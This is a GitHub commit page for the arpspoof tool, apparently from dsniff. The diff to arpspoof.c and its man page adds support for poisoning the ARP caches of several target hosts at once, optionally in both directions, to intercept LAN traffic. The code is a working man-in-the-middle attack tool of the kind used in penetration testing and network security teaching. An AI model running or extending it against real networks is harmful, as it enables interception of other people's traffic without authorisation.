Permalink
Browse files

arpspoof: allow use of of multiple targets

  • Loading branch information...
1 parent 8fbf0ac commit 25c761ebb1a8001d05da8b3dba36e96ac07ad586 @wertarbyte committed Nov 7, 2011
Showing with 69 additions and 35 deletions.
  1. +1 −1 arpspoof.8
  2. +68 −34 arpspoof.c
View
@@ -25,7 +25,7 @@ same, e.g. fragrouter(8)) must be turned on ahead of time.
Specify the interface to use.
.IP "\fB-t \fItarget\fR"
Specify a particular host to ARP poison (if not specified, all hosts
-on the LAN).
+on the LAN). Repeat to specify multiple hosts.
.IP "\fB-r\fR"
Poison both hosts (host and target) to capture traffic in both directions.
(only valid in conjuntion with -t)
View
@@ -29,9 +29,14 @@
extern char *ether_ntoa(struct ether_addr *);
+struct host {
+ in_addr_t ip;
+ struct ether_addr mac;
+};
+
static libnet_t *l;
-static struct ether_addr spoof_mac, target_mac;
-static in_addr_t spoof_ip, target_ip;
+static struct host spoof = {0};
+static struct host *targets;
static char *intf;
static int poison_reverse;
@@ -133,30 +138,46 @@ arp_find(in_addr_t ip, struct ether_addr *mac)
return (0);
}
+static int arp_find_all() {
+ struct host *target = targets;
+ while(target->ip) {
+ if (arp_find(target->ip, &target->mac)) {
+ return 1;
+ }
+ target++;
+ }
+
+ return 0;
+}
+
static void
cleanup(int sig)
{
- int fw = arp_find(spoof_ip, &spoof_mac);
- int bw = poison_reverse && target_ip && arp_find(target_ip, &target_mac);
+ int fw = arp_find(spoof.ip, &spoof.mac);
+ int bw = poison_reverse && targets[0].ip && arp_find_all();
int i;
fprintf(stderr, "Cleaning up and re-arping targets...\n");
for (i = 0; i < 5; i++) {
- /* XXX - on BSD, requires ETHERSPOOF kernel. */
- if (fw) {
- arp_send(l, ARPOP_REPLY,
- (u_int8_t *)&spoof_mac, spoof_ip,
- (target_ip ? (u_int8_t *)&target_mac : NULL),
- target_ip);
- /* we have to wait a moment before sending the next packet */
- sleep(1);
- }
- if (bw) {
- arp_send(l, ARPOP_REPLY,
- (u_int8_t *)&target_mac, target_ip,
- (u_int8_t *)&spoof_mac,
- spoof_ip);
- sleep(1);
+ struct host *target = targets;
+ while(target->ip) {
+ /* XXX - on BSD, requires ETHERSPOOF kernel. */
+ if (fw) {
+ arp_send(l, ARPOP_REPLY,
+ (u_int8_t *)&spoof.mac, spoof.ip,
+ (target->ip ? (u_int8_t *)&target->mac : NULL),
+ target->ip);
+ /* we have to wait a moment before sending the next packet */
+ sleep(1);
+ }
+ if (bw) {
+ arp_send(l, ARPOP_REPLY,
+ (u_int8_t *)&target->mac, target->ip,
+ (u_int8_t *)&spoof.mac,
+ spoof.ip);
+ sleep(1);
+ }
+ target++;
}
}
@@ -171,18 +192,23 @@ main(int argc, char *argv[])
char pcap_ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
int c;
+ int n_targets;
+ spoof.ip = 0;
intf = NULL;
- spoof_ip = target_ip = 0;
poison_reverse = 0;
+ n_targets = 0;
+
+ /* allocate enough memory for target list */
+ targets = calloc( argc+1, sizeof(struct host) );
while ((c = getopt(argc, argv, "ri:t:h?V")) != -1) {
switch (c) {
case 'i':
intf = optarg;
break;
case 't':
- if ((target_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
+ if ((targets[n_targets++].ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
usage();
break;
case 'r':
@@ -198,28 +224,32 @@ main(int argc, char *argv[])
if (argc != 1)
usage();
- if (poison_reverse && !target_ip) {
+ if (poison_reverse && !n_targets) {
errx(1, "Spoofing the reverse path (-r) is only available when specifying a target (-t).");
usage();
}
- if ((spoof_ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1)
+ if ((spoof.ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1)
usage();
if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL)
errx(1, "%s", pcap_ebuf);
if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL)
errx(1, "%s", libnet_ebuf);
-
- if (target_ip != 0 && !arp_find(target_ip, &target_mac))
- errx(1, "couldn't arp for host %s",
- libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE));
+
+ struct host *target = targets;
+ while(target->ip) {
+ if (target->ip != 0 && !arp_find(target->ip, &target->mac))
+ errx(1, "couldn't arp for host %s",
+ libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
+ target++;
+ }
if (poison_reverse) {
- if (!arp_find(spoof_ip, &spoof_mac)) {
+ if (!arp_find(spoof.ip, &spoof.mac)) {
errx(1, "couldn't arp for spoof host %s",
- libnet_addr2name4(spoof_ip, LIBNET_DONT_RESOLVE));
+ libnet_addr2name4(spoof.ip, LIBNET_DONT_RESOLVE));
}
}
@@ -228,11 +258,15 @@ main(int argc, char *argv[])
signal(SIGTERM, cleanup);
for (;;) {
- arp_send(l, ARPOP_REPLY, NULL, spoof_ip,
- (target_ip ? (u_int8_t *)&target_mac : NULL),
- target_ip);
- if (poison_reverse) {
- arp_send(l, ARPOP_REPLY, NULL, target_ip, (uint8_t *)&spoof_mac, spoof_ip);
+ struct host *target = targets;
+ while(target->ip) {
+ arp_send(l, ARPOP_REPLY, NULL, spoof.ip,
+ (target->ip ? (u_int8_t *)&target->mac : NULL),
+ target->ip);
+ if (poison_reverse) {
+ arp_send(l, ARPOP_REPLY, NULL, target->ip, (uint8_t *)&spoof.mac, spoof.ip);
+ }
+ target++;
}
sleep(2);

0 comments on commit 25c761e

Please sign in to comment.